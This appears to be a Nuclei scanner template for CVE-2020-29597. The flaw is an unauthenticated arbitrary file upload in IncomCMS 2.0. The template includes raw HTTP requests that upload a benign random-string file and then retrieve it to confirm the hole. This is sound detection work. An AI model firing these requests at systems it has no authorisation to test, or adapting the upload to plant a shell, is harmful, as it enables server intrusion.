id: CVE-2020-29597 info: name: IncomCMS 2.0 - Arbitrary File Upload author: princechaddha severity: critical description: | IncomCMS 2.0 has a an insecure file upload vulnerability in modules/uploader/showcase/script.php. This allows unauthenticated attackers to upload files into the server. impact: | Successful exploitation of this vulnerability can result in unauthorized access, data leakage, and potential remote code execution. remediation: | Apply the latest security patch or update to a version that addresses the vulnerability. reference: - https://github.com/Trhackno/CVE-2020-29597 - https://nvd.nist.gov/vuln/detail/CVE-2020-29597 - https://github.com/M4DM0e/m4dm0e.github.io/blob/gh-pages/_posts/2020-12-07-incom-insecure-up.md - https://m4dm0e.github.io/2020/12/07/incom-insecure-up.html - https://github.com/trhacknon/CVE-2020-29597 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-29597 cwe-id: CWE-434 epss-score: 0.78448 epss-percentile: 0.9817 cpe: cpe:2.3:a:incomcms_project:incomcms:2.0:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: incomcms_project product: incomcms tags: cve,cve2020,incomcms,fileupload,intrusive,incomcms_project http: - raw: - | POST /incom/modules/uploader/showcase/script.php HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBEJZt0IK73M2mAbt ------WebKitFormBoundaryBEJZt0IK73M2mAbt Content-Disposition: form-data; name="Filedata"; filename="{{randstr_1}}.png" Content-Type: text/html {{randstr_2}} ------WebKitFormBoundaryBEJZt0IK73M2mAbt-- - | GET /upload/userfiles/image/{{randstr_1}}.png HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: word part: body_1 words: - '{"status":"1","name":"{{randstr_1}}.png"}' - type: word part: body_2 words: - '{{randstr_2}}' # digest: 4a0a00473045022100ab5832fbca2af41f73d0a9dd5b7e6a5d11131ec0ef50cf26f0613d515b953718022046f83ee4202dafd7b1a1b379f116c6d1a31b1ebe1dc45a9e355c444f9e84e968:922c64590222798bb761d5b6d8e72950